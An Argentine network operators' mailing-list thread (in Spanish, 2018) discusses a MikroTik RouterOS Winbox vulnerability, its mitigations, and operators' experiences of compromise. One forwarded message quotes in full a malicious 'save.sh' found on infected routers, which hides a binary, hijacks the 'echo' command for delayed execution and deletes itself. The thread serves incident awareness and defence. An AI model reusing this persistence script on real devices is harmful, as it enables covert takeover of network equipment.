[Lista ArNOG] Alerta seguridad Mikrotik

Ivan Chapero info en ivanchapero.com.ar
Mar Abr 24 12:02:58 ART 2018 

MK no esta contando todo.
Procesos de MGT corriendo como root, passwords reversibles (y no se si en
plain-text) y modificaciones al SO que no son visibles para un usuario
normal de la CLI/Winbox.

Lo mas loco que salvo el bug de acceso, tomaron como "secundario" todo lo
otro. Palabras del propio soporte.

Saludos.

El 24 de abril de 2018, 8:35, Jose Luis Gaspoz <gaspozj en is.com.ar> escribió:

>
> Nosotros fuimos víctimas de esto hace unos 10 dias atrás (eso quiere decir
> que puede hacer bastante tiempo que está) en un CCR 1036 que no estaba lo
> suficientemente cerrado al exterior y fué exactamente de esa manera.... lo
> sospechoso es el tema que lo primero que hace (que aparece en el log) es
> “ip services changed by .....” y tiene que ser un script que lo corre
> porque el log tiene el mismo timestamp que el logueo vía Winbox.
>
> No encontramos ningún cambio aparente en “ip services” (revisamos todo lo
> que se puede ver en un CCR).
>
> Era de un cliente, por lo que se lo actualizó (SO y firmware), se
> cambiaron las pass y se cerro el equipo para cualquier servicio exterior y
> “en apariencia” esta funcionando normalmente (no tiene mucha exigencia por
> ser de un cliente).
>
> OJO, no hay nada sospechoso, así que puede haber muchos infectados porque
> solo aparece eso en el log hasta que se sobreescribe..... salvo que esten
> logueando a un syslog.
>
> Saludos
>
> Ing. Jose Luis Gaspoz
> Internet Services S.A.
> Tel: 0342-4565118
> Cel: 342-5008523
>
> *From:* Carriers <carriers en dainus.net>
> *Sent:* Tuesday, April 24, 2018 7:06 AM
> *To:* lista en arnog.com.ar ; lista en arnog.com.ar
> *Subject:* Re: [Lista ArNOG] Alerta seguridad Mikrotik
>
> Estimados  ojo  con esa versión  yo tube un par de problemas  se me iban
> los ping altisimos . al parecer hay  cambios en el enrutamiento
>
> En 24 de abril de 2018, en 06:46, Juan Pablo Orsi <
> juanpablo en internetlocal.com.ar> escribió:
>>
>> En el día de hoy MikroTik <http://mikrotik.com/> ha publicado un alerta
>> de seguridad
>> <https://forum.mikrotik.com/viewtopic.php?f=21&t=133533&p=656255> sobre
>> una vulnerabilidad en el RouterOS que afecta a todas las versiones desde
>> la v6.29.
>>
>> Según el alerta, indica que la vulnerabilidad ha sido descubierta por
>> ellos mismos y que recomiendan actualizar ASAP (lo mas pronto posible).
>>
>> La vulnerabilidad permite a una “*herramienta especial*” conectar al
>> puerto del Winbox y poder solicitar la base de datos de los usuarios del
>> sistema.
>>
>> Para tomar una medida al respecto se recomienda:
>>
>>    - Actualizar a la v6.42.1 y v6.43rc4 *Con precaución(leer mas
>>    adelante)
>>    - Cerrar el puerto del Winbox para el acceso publicomediante un *address
>>    list* y el *firewall* en el chain *input*
>>    - Limitar el rango de IP permitidos en *ip > service > winbox* a las
>>    redes locales unicamente.
>>    - Cambiar las contraseñas de los usuarios.
>>
>> Es importante tener en cuentaque en las recientes versiones del RouterOS
>> existe un nuevo esquema en el manejo del bridge, porque lo hay que tener
>> ciertas precauciones al actualizar debido a que se han dado casos de
>> actualizaciones fallidas en configuraciones que tienen bridge y utilizan el
>> chip switch.
>>
>> En caso de equipos que se encuentren en  producción y no es posible
>> actualizar rápidamente el sistema operativo, es mandatorio que se cierre
>> el acceso del winbox y cambiar las contraseñas de los usuarios.
>>
>> Por el momento no es posible conocer o detectar que el sistema ha sido
>> vulnerado, por lo que también se recomienda aplicar el punto anterior.
>>
>> https://forum.mikrotik.com/viewtopic.php?f=21&t=133533&p=656255
>> ACTUALIZACION:
>>
>> Algunos usuarios están reportan que detectan dos archivos dentro de
>> *files* con el nombre de *dnstest* con contenido binario y *save.sh* con
>> el siguiente contenido:
>>
>> #!/bin/ash
>> case "$PATH" in
>> */usr/local/bin*)
>> # old versions
>> dest="/usr/local/bin/"
>> ;;
>> *)
>> dest="/flash/bin/"
>> if [ ! -d "/flash/" ]; then
>> exit 1
>> fi
>> ;;
>> esac
>>
>> if [ -f $dest/.dnstest ]; then
>> rm $dest/.dnstest
>> fi
>> if [ -f $dest/echo ]; then
>> rm $dest/echo
>> fi
>> if [ -f $dest/.test ]; then
>> rm $dest/.test
>> fi
>>
>> mkdir -p $dest
>>
>> export PATH=$PATH:$dest
>> chmod a+x /flash/rw/pckg/dnstest
>> cp /flash/rw/pckg/dnstest $dest/.dnstest
>>
>> echo -e "#!/bin/ash\nusleep 180000000\ncp $dest.dnstest /tmp/.dnstest\n/tmp/.dnstest*" > $dest/.test
>> chmod +x $dest/.test
>>
>> echo -e "#!/bin/ash\n/$dest.test&\n/bin/echo \$*" > $dest/echo
>> chmod +x $dest/echo
>> /flash/rw/pckg/dnstest
>> rm save.sh
>>
>> El intento tiene el siguiente comportamiento:
>>
>> Como se observa en la siguiente captura, el primer acceso es un intento
>> fallido del winbox, por lo que se presume que tiene el acceso a la DB de
>> usuarios. Luego el acceso es con el usuario con permisos *full.*
>>
>> [image: Comportamiento de Acceso]
>>
>> ------------------------------
>>
>> Lista mailing list
>> Lista en arnog.com.ar
>> http://mailmancabase.interdotnet.com.ar/mailman/listinfo/lista
>>
>>
>
> <http://www.avg.com/email-signature?utm_medium=email&utm_source=link&utm_campaign=sig-email&utm_content=emailclient> Libre
> de virus. www.avg.com
> <http://www.avg.com/email-signature?utm_medium=email&utm_source=link&utm_campaign=sig-email&utm_content=emailclient>
>
> ------------------------------
> _______________________________________________
> Lista mailing list
> Lista en arnog.com.ar
> http://mailmancabase.interdotnet.com.ar/mailman/listinfo/lista
>
>
> _______________________________________________
> Lista mailing list
> Lista en arnog.com.ar
> http://mailmancabase.interdotnet.com.ar/mailman/listinfo/lista
>
>


-- 

*Ivan ChaperoÁrea Técnica y Soporte*
Fijo: 03464-470280 (interno 535) | Móvil:  03464-155-20282  | Skype ID:
ivanchapero
--
GoDATA Banda Ancha - CABLETEL S.A. | Av. 9 de Julio 1163 - 2183 - Arequito
- Santa Fe - Argentina
------------ próxima parte ------------
Se ha borrado un adjunto en formato HTML...
URL: <http://mailmancabase.interdotnet.com.ar/pipermail/lista/attachments/20180424/0049936a/attachment-0001.html>

Más información sobre la lista de distribución Lista